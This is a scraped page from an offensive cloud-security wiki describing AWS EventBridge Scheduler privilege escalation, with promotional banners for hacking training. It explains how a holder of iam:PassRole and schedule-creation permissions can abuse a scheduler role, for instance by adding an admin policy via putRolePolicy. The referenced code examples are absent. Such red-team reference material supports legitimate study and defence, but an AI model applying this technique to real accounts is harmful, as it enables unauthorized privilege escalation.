AWS - EventBridge Scheduler Privesc
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
EventBridge Scheduler
More info EventBridge Scheduler in:
AWS - EventBridge Scheduler Enumiam:PassRole
, (scheduler:CreateSchedule
| scheduler:UpdateSchedule
)
iam:PassRole
, (scheduler:CreateSchedule
| scheduler:UpdateSchedule
)An attacker with those permissions will be able to create
|update
an scheduler and abuse the permissions of the scheduler role attached to it to perform any action
For example, they could configure the schedule to invoke a Lambda function which is a templated action:
In addition to templated service actions, you can use universal targets in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "AdminAccessPolicy", using a role that has "putRolePolicy" policy:
References
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Last updated